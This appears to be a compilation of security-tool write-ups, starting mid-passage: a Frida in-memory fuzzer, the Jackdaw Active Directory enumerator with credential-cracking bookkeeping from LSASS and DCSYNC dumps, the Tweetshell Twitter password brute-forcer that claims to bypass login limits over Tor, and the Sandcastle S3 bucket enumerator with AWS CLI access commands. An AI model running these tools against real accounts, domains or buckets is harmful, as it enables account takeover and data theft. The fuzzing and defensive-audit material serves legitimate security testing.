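    return 'cf-browser-verification cf-im-under-attack' in html

challenge = '<div class="cf-browser-verification cf-im-under-attack">Checking your browser...</div>'
print(is_cloudflare_challenge(challenge))          # True
print(is_cloudflare_challenge('<html>ok</html>'))  # False
```

If the check fires, the check-in from that IP is being dropped and the tracking data will not reach Grabify.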


Frida API Fuzzer - This Experimetal Fuzzer Is Meant To Be Used For API In-Memory Fuzzing


This experimental fuzzer is meant to be used for API in-memory fuzzing.
The design is heavily inspired by and based on AFL/AFL++.
At the moment the mutator is quite simple: just AFL's havoc and splice stages.
I tested only the examples under tests/; this is a WIP project, but it is known to work at least on GNU/Linux x86_64 and Android x86_64.
You need Frida >= 12.8.1 to run this (pip3 install -U frida) and frida-tools to compile the harness.
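The havoc stage mentioned above works by stacking random byte-level mutations on a testcase. A simplified Python sketch of the idea (not frida-fuzzer's actual JavaScript implementation):

```python
import random

def havoc(data, rounds=16, seed=None):
    """Apply a stack of random byte-level mutations, AFL-havoc style."""
    rng = random.Random(seed)
    buf = bytearray(data)
    for _ in range(rounds):
        if not buf:
            break
        op = rng.randrange(3)
        pos = rng.randrange(len(buf))
        if op == 0:    # flip one random bit
            buf[pos] ^= 1 << rng.randrange(8)
        elif op == 1:  # overwrite with a random byte
            buf[pos] = rng.randrange(256)
        else:          # overwrite with an "interesting" boundary value
            buf[pos] = rng.choice([0, 1, 0x7F, 0x80, 0xFF])
    return bytes(buf)

print(havoc(b"hello world", seed=1337).hex())  # deterministic for a fixed seed
```

The real havoc stage also resizes inputs and splices in dictionary tokens; this sketch keeps only the in-place byte mutations to show the core loop.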

Usage
The fuzz library has to be imported into a custom harness and then compiled with frida-compile to generate the agent that frida-fuzzer will inject into the target app.
The majority of the logic of the fuzzer is in the agent.
A harness has the following format:
var fuzz = require("./fuzz");

var TARGET_MODULE = "test_linux64";
var TARGET_FUNCTION = DebugSymbol.fromName("target_func").address;
var RET_TYPE = "void";
var ARGS_TYPES = ['pointer', 'int'];

var func_handle = new NativeFunction(TARGET_FUNCTION, RET_TYPE, ARGS_TYPES, { traps: 'all' });

fuzz.target_module = TARGET_MODULE;

var payload_mem = Memory.alloc(fuzz.config.MAX_FILE);

fuzz.fuzzer_test_one_input = function (/* Uint8Array */ payload) {

Memory.writeByteArray(payload_mem, payload, payload.length);

func_handle(payload_mem, payload.length);

}
fuzz.fuzzer_test_one_input is mandatory. If you don't specify fuzz.target_module, all the code executed will be instrumented.
You can also set fuzz.manual_loop_start = true to tell the fuzzer that you will call fuzz.fuzzing_loop() in a callback and so it must not call it for you (e.g. to start fuzzing when a button is clicked in the Android app).
The callback fuzz.init_callback can be set to execute code when the fuzzer is ready to begin. See tests/test_java.js for an example.
fuzz.dictionary is a classic fuzzer dictionary, an array in which you can add items (accepted types are Array, ArrayBuffer, Uint8Array, String) that are used as additional values in the mutator. See tests/test_libxml2.js for an example.
frida-fuzzer accepts the following arguments:
  -i FOLDER        Folder with initial seeds
  -o FOLDER        Output folder with intermediate seeds and crashes
  -U               Connect to USB
  -spawn           Spawn and attach instead of simply attaching
  -script SCRIPT   Script filename (default is fuzzer-agent.js)
If you don't specify the output folder, a temp folder is created under /tmp. If you don't specify the folder with the initial seeds, an uninformed seed 0000 is used as the starting seed.
If you are fuzzing a local application, you may want to execute system-config before frida-fuzzer to tune your system's parameters and speed things up.
Running ./frida-fuzzer -spawn ./tests/test_linux64 you will see something like the following status screen on your terminal:


You can also easily add a custom stage in fuzz/fuzzer.js and add it to the stages list in fuzz/index.js.
To customize the fuzzer, edit fuzz/config.js. The variables that you may want to change are MAP_SIZE (If the code that you are fuzzing is small you can reduce it and gain a bit of speed), MAX_FILE (the maximum size of generated input) and QUEUE_CACHE_MAX_SIZE (increase the queue cache size for more speed, especially on Android).

Example
Let's fuzz the native shared library in the example Android app in tests.
Make sure you have root on your virtual device:
host$ adb root
Download the Android x86_64 frida-server from the repo release page and copy it on the device under /data/local/tmp (use adb push).
Start a shell and run the frida-server:
device# cd /data/local/tmp
device# ./frida-server
Now install the test app tests/app-debug.apk by dragging and dropping it into the emulator window.
Then, open the app.
Compile the agent script with frida-compile:
host$ frida-compile -x tests/test_ndk_x64.js -o fuzzer-agent.js
Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command:
host$ ./frida-fuzzer -U -o output_folder/ com.example.ndktest1
Interesting testcases and crashes are both saved into output_folder.
Enjoy.


TODO
Hey OSS community, there are a lot of TODOs if someone wants to contribute.
  • Java code fuzzing (waiting for additional exposed methods in frida-java-bridge, should be easy, almost done)
  • splice stage (merge two testcases from the queue and apply havoc on the result)
  • support dictionaries (and so modify also havoc)
  • seed selection
  • inlined instrumentation for arm64
  • performance scoring (explore schedule of AFL)
  • structural mutator (mutate bytes based on a grammar written in JSON)
  • CompareCoverage (sub-instruction profiling to bypass fuzzing roadblocks)
  • rewrite frida-fuzzer in C with frida-core to be able to run all stuff on the mobile device
If you have doubts about any of these features, feel free to DM me on Twitter.
For feature proposals, there is the Issues section.


Jackdaw - Tool To Collect All Information In Your Domain And Show You Nice Graphs


Jackdaw is here to collect all information in your domain, store it in a SQL database, and show you nice graphs of how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.

Example commands
Most of these commands are already available from the web API, except for the database init.

DB init
jackdaw --sql sqlite:///<full path here>/test.db dbinit

Enumeration

Full enumeration with integrated sspi - windows only
jackdaw --sql sqlite:///test.db enum 'ldap+sspi://10.10.10.2' 'smb+sspi-ntlm://10.10.10.2'

Full enumeration with username and password - platform independent
The password is Passw0rd!
jackdaw --sql sqlite:///test.db enum 'ldap://TEST\victim:Passw0rd!@10.10.10.2' 'smb+ntlm-password://TEST\victim:Passw0rd!@10.10.10.2'

LDAP-only enumeration with username and password - platform independent
The password is Passw0rd!
jackdaw --sql sqlite:///test.db ldap 'ldap://TEST\victim:Passw0rd!@10.10.10.2'

Start interactive web interface to plot graph and access additional features
jackdaw --sql sqlite:///<FULL PATH TO DB> nest
Open http://127.0.0.1:5000/ui for the API
Please see the Building the UI section further down to learn how to build the UI. Once built:
Open http://127.0.0.1:5000/nest for the graph interface (shows the graph, but far from working)

Features

Data acquisition

via LDAP
The LDAP enumeration phase acquires data on AD info, User, Machine, OU, and Group objects, each of which is represented as a node in the graph and as a separate table in the DB. Additionally, all aforementioned objects' Security Descriptors are parsed, and the ACLs of the DACL are added to the DB. This, together with the membership information, is represented as edges in the graph. Custom SQL queries can also be performed on any of the aforementioned data types when needed.

via SMB
The SMB enumeration phase acquires data on shares, local groups, sessions, and NTLM data by connecting to each machine in the domain (the machine list is acquired via LDAP).

via LSASS dumps (optional)
The framework allows users to upload LSASS memory dumps to store credentials and extend the session information table. Both will be used as additional edges in the graph (shared password and session respectively). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via DCSYNC results (optional)
The framework allows users to upload impacket's DCSYNC files to store credentials. These will be used as additional edges in the graph (shared password). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via manual upload (optional)
The framework allows manually extending the available DB in every aspect. Example: when user session information on a given computer is discovered (outside of the automatic enumeration), these sessions can be uploaded manually, which will populate the DB and also the resulting graph.

Graph
The framework can generate a graph using the available information in the database and plot it via the web UI (nest). Furthermore, graph generation and path calculations can be invoked programmatically, either by using the web API (/ui endpoint) or the graph object's functions.
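Under the hood, a path calculation over the collected nodes and edges is a plain graph search. A hedged Python sketch using BFS over a made-up edge list (illustrative only, not Jackdaw's actual API or schema):

```python
from collections import deque

def shortest_path(edges, src, dst):
    """BFS shortest path over directed, labeled edges like (node, label, node)."""
    adj = {}
    for a, label, b in edges:
        adj.setdefault(a, []).append((label, b))
    queue, seen = deque([(src, [src])]), {src}
    while queue:
        node, path = queue.popleft()
        if node == dst:
            return path
        for label, nxt in adj.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [f"-{label}->", nxt]))
    return None  # no path exists

# Hypothetical attack-path edges, in the BloodHound spirit
edges = [
    ("victim", "MemberOf", "helpdesk"),
    ("helpdesk", "AdminTo", "WS01"),
    ("WS01", "HasSession", "domain_admin"),
]
print(shortest_path(edges, "victim", "domain_admin"))
# ['victim', '-MemberOf->', 'helpdesk', '-AdminTo->', 'WS01', '-HasSession->', 'domain_admin']
```

The interesting engineering in Jackdaw is building that edge list from LDAP/SMB data; once it exists, path queries are standard graph traversal.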

Anomaly detection
The framework can identify common AD misconfigurations without graph generation. Currently only via the web API.

User
User anomaly detection involves detecting insecure UAC permissions and extensive user description values. This feature set is expected to grow as new features are implemented.

Machine
Machine anomaly detection involves detecting insecure UAC permissions, non-mandatory SMB signing, outdated OS versions, and out-of-domain machines. This feature set is expected to grow as new features are implemented.

Password cracking
The framework does not perform any cracking itself; it only organizes the hashes and the cracking results.
The current main focus is on impacket's and aiosmb's DCSYNC results (NT and LM hashes only!).
A sample process is the following:
  1. Harvesting credentials as text file via impacket/aiosmb or as memory dumps of the LSASS process via whatever tool you see fit.
  2. Upload the harvested credentials via the API
  3. Poll uncracked hashes via the API
  4. Crack them (hashcat?)
  5. Upload the results to the framework via the API
  6. Generate a report on the cracked/uncracked users and password strength and password sharing
Note from the author: This feature was implemented for both attackers and defenders. Personally I don't see much added value on either side, since once you have obtained the NT hash of a user it's just as good as the password... Nonetheless, more and more companies are performing password strength exercises, and this feature would help them. As for attackers: it is just showing off at this point, but be my guest. Maybe scare management for extra points.
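The shared-password part of such a report boils down to grouping accounts by hash. A minimal Python sketch over hypothetical (user, NT hash) pairs (not Jackdaw's actual schema or code):

```python
from collections import defaultdict

def shared_password_report(creds):
    """Group users by NT hash; return only hashes shared by two or more accounts."""
    by_hash = defaultdict(list)
    for user, nt_hash in creds:
        by_hash[nt_hash].append(user)
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}

creds = [("alice", "aabb"), ("bob", "aabb"), ("carol", "ccdd")]
print(shared_password_report(creds))  # {'aabb': ['alice', 'bob']}
```

Each shared hash then becomes a "shared password" edge between the affected accounts in the graph.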

Important
This project is in experimental phase! This means multiple things:
  1. it may crash
  2. the controls you are using might change in the future (most likely)
  3. (worst part) The database design is not necessarily suitable for future requirements, so it may change. There will be no effort to maintain backwards compatibility with the experimental-phase DB structure!

Technical part

Database backend
Jackdaw uses the SQLAlchemy ORM module, which gives you the option to use any SQL DB backend you like. The tests are mainly done on SQLite for obvious reasons. No backend-specific commands that would limit you will be used in this project.

Building the UI
THIS IS ONLY NEEDED IF YOU INSTALL VIA GIT AND/OR CHANGE SOMETHING IN THE UI CODE
The UI was written in React. Before first use/installation you have to build it. For this, you will need nodejs and npm installed. Then:
  1. Go to jackdaw/nest/site/nui
  2. Run npm install
  3. Run npm run build
Once done with the above, the UI is ready to play with.

Kudos
"If I have seen further it is by standing on the shoulders of Giants."

For the original idea
BloodHound team

For the ACL edge calculation
@dirkjanm (https://github.com/dirkjanm/)

For the awesome UI
Zsolt Imre (https://github.com/keymandll)

For the data collection parts
please see kudos section in aiosmb and msldap modules

In case I forgot to mention someone pls send a PR


Tweetshell - Multi-thread Twitter BruteForcer In Shell Script


Tweetshell is a shell script to perform multi-threaded brute force attacks against Twitter. It can bypass login limiting and test an unlimited number of passwords at a rate of 400+ passwords/min using 20 threads.

Legal disclaimer:
Usage of TweetShell for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Features
  • Multi-thread (400 pass/min, 20 threads)
  • Save/Resume sessions
  • Anonymous attack through TOR
  • Default password list (39k+ best 8-letter passwords)
  • Check valid username
  • Check and Install all dependencies

Usage:
git clone https://github.com/thelinuxchoice/tweetshell
cd tweetshell
chmod +x tweetshell.sh
service tor start
sudo ./tweetshell.sh

Install requirements (Curl, Tor):
chmod +x install.sh
sudo ./install.sh

Author: github.com/thelinuxchoice
IG: instagram.com/thelinuxchoice


Sandcastle - A Python Script For AWS S3 Bucket Enumeration


Inspired by a conversation with Instacart's @nickelser on HackerOne, I've optimised and published Sandcastle – a Python script for AWS S3 bucket enumeration, formerly known as bucketCrawler.
The script takes a target's name as the stem argument (e.g. shopify) and iterates through a file of bucket name permutations, such as the ones below:
-training
-bucket
-dev
-attachments
-photos
-elasticsearch
[...]
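Candidate generation is then just combining the stem with each permutation. A minimal Python sketch of the idea (the helper name is made up; this is not Sandcastle's actual code):

```python
def candidate_buckets(stem, permutations):
    """Combine a target stem with suffix permutations like '-dev' or '-photos'."""
    names = []
    for p in permutations:
        p = p.strip()
        if not p:
            continue  # skip blank lines in the permutation file
        # '-dev' -> 'shopify-dev'; a bare word gets a dash inserted
        names.append(stem + p if p.startswith("-") else f"{stem}-{p}")
    return names

print(candidate_buckets("shopify", ["-training", "-bucket", "-dev"]))
# ['shopify-training', 'shopify-bucket', 'shopify-dev']
```

Each candidate name is then probed as an S3 bucket, and the HTTP status code decides whether it is worth a closer look (see the status code table below).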

Getting started
Here's how to get started:
  1. Clone this repo (PyPi distribution temporarily disabled).
  2. Run sandcastle.py with a target name and input file (grab an example from this repo)
  3. Matching bucket permutations will be identified, and read permissions tested.
usage: sandcastle.py [-h] -t targetStem [-f inputFile]

arguments:
  -h, --help            show this help message and exit
  -t targetStem, --target targetStem
                        Select a target stem name (e.g. 'shopify')
  -f inputFile, --file inputFile
                        Select a bucket permutation file (default: bucket-names.txt)
   ____             __             __  __
/ __/__ ____ ___/ /______ ____ / /_/ /__
_\ \/ _ `/ _ \/ _ / __/ _ `(_-</ __/ / -_)
/___/\_,_/_//_/\_,_/\__/\_,_/___/\__/_/\__/

S3 bucket enumeration // release v1.2.4 // ysx


[*] Commencing enumeration of 'shopify', reading 138 lines from 'bucket-names.txt'.

[+] Checking potential match: shopify-content --> 403

An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied

Status codes and testing
Status code    Definition             Notes
404            Bucket Not Found       Not a target for analysis (hidden by default)
403            Access Denied          Potential target for analysis via the CLI
200            Publicly Accessible    Potential target for analysis via the CLI

AWS CLI commands
Here's a quick reference of some useful AWS CLI commands:
  • List Files: aws s3 ls s3://bucket-name
  • Download Files: aws s3 cp s3://bucket-name/<file> <destination>
  • Upload Files: aws s3 cp/mv test-file.txt s3://bucket-name
  • Remove Files: aws s3 rm s3://bucket-name/test-file.txt

What is S3?
From the Amazon documentation, Working with Amazon S3 Buckets:
Amazon S3 [Simple Storage Service] is cloud storage for the Internet. To upload your data (photos, videos, documents etc.), you first create a bucket in one of the AWS Regions. You can then upload any number of objects to the bucket.
In terms of implementation, buckets and objects are resources, and Amazon S3 provides APIs for you to manage them.

Closing remarks
  • This is my first public security project. Sandcastle is published under the MIT License.
  • Usage acknowledgements:
    • Castle (icon) by Andrew Doane from the Noun Project
    • Nixie One (logo typeface) free by Jovanny Lemonad

